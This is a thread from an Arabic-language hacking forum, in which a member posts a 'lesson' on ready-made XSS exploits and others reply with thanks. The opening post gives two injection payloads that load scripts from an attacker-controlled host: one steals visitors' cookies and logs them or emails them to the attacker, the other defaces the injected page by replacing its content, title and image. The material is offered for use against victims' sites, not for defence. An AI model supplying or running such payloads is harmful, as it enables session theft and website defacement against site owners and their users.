1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Egy HacKerS | المشاهدات : 501 | الردود : 7
  1. Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    50
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    [​IMG]
    بسم الله الرحمن الرحيم

    احبتي الأعزاء السلام عليكم ورحمة الله وبركاته

    تقبل الله صيامكم وقيامكم صومآ مقبولآ وافطارآ شهيآ

    أسأل الله ان يتقبل منا ومنكم وان يجمعنا بكم في الفردوس الاعلى

    [​IMG]

    درسنا لهذا اليوم بتكلم عن بعض الإستغلالات الجاهزة لثغرات xss

    الإستغلال الأول : Log File For Get Cookies (لجلب الكوكيز)

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/cookies/xss.js></sc ript>[/CODEE]

    إمسح الفراغات

    يجب رفع ملفي xss.js & info_mail.php في مجلد cookies

    والنتائج ستظهر في ملف log.html

    [​IMG]

    أو يمكنك وضع إيميلك وستصلك رسالة بكوكيز الضحية


    ملاحظة الرجاء تعديل ملف info_mail.php لان الايميل الافتراضي هو root.sy@hotmail.com

    اذا لم تعدل عليه ستذهب جميع معلومات السحب على الايميل

    الإستغلال الثاني : change index

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/index/c_index.js></sc ript>[/CODEE]

    سيتم وضع الإندكس على كامل الصفحة + تغير title الصفحة + صورة في الإندكس

    يمكن تغير لينك الصورة من داخل الملف : c_index.js

    [​IMG]

    [​IMG]
     

    الملفات المرفقة:

    آخر تعديل بواسطة المشرف: ‏25 يونيو 2015
  2. Wolf Hex DeveloPer Plus

    الأنتساب:
    ‏24 فبراير 2015
    المشاركات:
    264
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    Student
    الإقامة:
    دولة أمير المؤمنين (ع)
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه الله
    ثغرة جميله واستغلال اجمل
    يعطيك العافيه على مجهودك
    لاتحرمنا جديدك
    {1!$7}
     
  3. J3eny Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    المدينه المنوره
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مبدع من يومك يابطل :ُye@:
     
  4. Resident Evil Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    47
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    20
    الإقامة:
    my home
    نظام التشغيل:
    Linux
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور اخوي.... وفقك الله
     
  5. SMART-AL-Falahi Developer

    الأنتساب:
    ‏14 فبراير 2015
    المشاركات:
    156
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الإقامة:
    Oman
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه اللهمشكور اخي الغال ي طريقه قديم لكنه فعاله

     
  6. سنوكـــر Developer

    الأنتساب:
    ‏18 يوليو 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    السعوديه - الباحه
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    :{7}: مشكووووووور أخي :{7}:​
     
  7. before Developer

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    17
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    15
    نظام التشغيل:
    windows 7
    Facebook:
    YouTube:
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    شكرا اخي على الامثلة
     
  8. غاوي هكر DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    215
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الإقامة:
    فلسطين
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور يا عسل بوركت
     

مشاركة هذه الصفحة